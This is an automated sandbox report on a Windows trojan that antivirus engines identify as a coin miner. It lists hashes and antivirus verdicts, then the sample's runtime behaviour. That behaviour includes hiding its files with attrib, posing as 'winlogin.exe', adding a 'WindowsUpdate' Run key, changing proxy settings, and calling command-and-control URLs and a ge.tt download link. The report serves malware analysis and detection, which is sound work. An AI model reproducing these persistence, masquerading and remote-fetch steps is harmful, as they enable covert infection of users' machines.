Analysis Date: 2014-11-13 22:33:24
MD5: 69b4d82069506551329f83deecec57a0
SHA1: 11762d29f5240b6d7869dc5339b259b69bcb49e6

Static Details:

File type: PE32 executable for MS Windows (console) Intel 80386 32-bit
Section: .text md5: 462018ad4378a65e795351c9d4d5ff2f sha1: 852c9f4b5b0dcf461934e9a415fbf11e5f3ef138 size: 153600
Section: .rdata md5: 206833d7201ac5dcf6bc81b15750d78d sha1: 63d643050ad049de96e602f41b7c5e6ada180e89 size: 45568
Section: .data md5: ced8f54e5c5edcfd6aac2134c1eb9a13 sha1: 3e83a2b5e85595ea37d91e77990727756d3d5741 size: 7168
Section: .rsrc md5: 2d5eb1e7989b77f5c38c72583a0272d3 sha1: c39a70046d66c7dbb155a0d50bcddb26c01bcc7f size: 512
Section: .reloc md5: da961155a6c41331c5d6d04e6aa0edef sha1: ec927d2fe2181aa7fa79ef5ddd07f6adff29d0ec size: 8704
Timestamp: 2014-11-04 06:51:04
Pdb path: C:\Users\MrUnzO\documents\visual studio 2013\Projects\ConsoleApplication3\Release\ConsoleApplication3.pdb
Packer: Microsoft Visual C++ ?.?
PEhash: e1cae17e1b33da7294ea755fa24207d7c48cfe02
IMPhash: 6cca618453e8177e3292c696b489e72c
AV: 360 Safe - Gen:Variant.Graftor.149231
AV: Ad-Aware - Gen:Variant.Graftor.149231
AV: Alwil (avast) - Malware-gen:Win32:Malware-gen
AV: Arcabit (arcavir) - no_virus
AV: Authentium - W32/Heuristic-KPP!Eldorado
AV: Avira (antivir) - TR/Agent.216576.46
AV: BullGuard - Gen:Variant.Graftor.149231
AV: CA (E-Trust Ino) - no_virus
AV: CAT (quickheal) - no_virus
AV: ClamAV - no_virus
AV: Dr. Web - no_virus
AV: Emsisoft - Gen:Variant.Graftor.149231
AV: Eset (nod32) - Win32/CoinMiner.VO
AV: Fortinet - W32/CoinMiner.VO!tr
AV: Frisk (f-prot) - no_virus
AV: F-Secure - Gen:Variant.Graftor.149231
AV: Grisoft (avg) - Win32/DH{gRI2A2IP}
AV: Ikarus - no_virus
AV: K7 - no_virus
AV: Kaspersky - Trojan.Win32.Generic
AV: MalwareBytes - no_virus
AV: Mcafee - New Malware.ca
AV: Microsoft Security Essentials - no_virus
AV: MicroWorld (escan) - Gen:Variant.Graftor.149231
AV: Norman - Gen:Variant.Graftor.149231
AV: Rising - no_virus
AV: Sophos - no_virus
AV: Symantec - no_virus
AV: Trend Micro - no_virus
AV: VirusBlokAda (vba32) - no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"
Creates Process: C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"

Creates Process: attrib +h "config.ini"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "."

Creates Process: attrib +h "."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h ".."

Creates Process: attrib +h ".."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"

Creates Process: attrib +h "C:\malware.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Process
↳ C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate ➝ "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe" -autorun\\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Application Data\Windows\config.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "."
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h ".."
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"
Creates Mutex: Local\$myprogram$
Winsock DNS: h4ck3r4k3.ddns.net
Winsock DNS: h4ck3r.info
Winsock DNS: ge.tt
Winsock URL: http://ge.tt/api/1/files/7ZgNjE32/0/blob?download
Winsock URL: http://h4ck3r4k3.ddns.net/x.php?ID=0&V=2
Winsock URL: http://H4CK3R.INFO/c.php?V=2&ID=0
Winsock URL: http://H4CK3R.INFO/x.php?ID=0&V=2

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ attrib +h "config.ini"

Process
↳ attrib +h "."

Process
↳ attrib +h ".."

Process
↳ attrib +h "C:\malware.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Network Details:

DNS: h4ck3r.info
Type: A
184.168.221.26
DNS: h4ck3r4k3.ddns.net
Type: A
8.23.224.90
DNS: ge.tt
Type: A
54.195.252.180
HTTP GET: http://h4ck3r.info/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r4k3.ddns.net/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r.info/c.php?V=2&ID=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r.info/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r4k3.ddns.net/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://ge.tt/api/1/files/7ZgNjE32/0/blob?download
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1033 ➝ 8.23.224.90:80
Flows TCP: 192.168.1.1:1034 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1035 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1036 ➝ 8.23.224.90:80
Flows TCP: 192.168.1.1:1037 ➝ 54.195.252.180:80
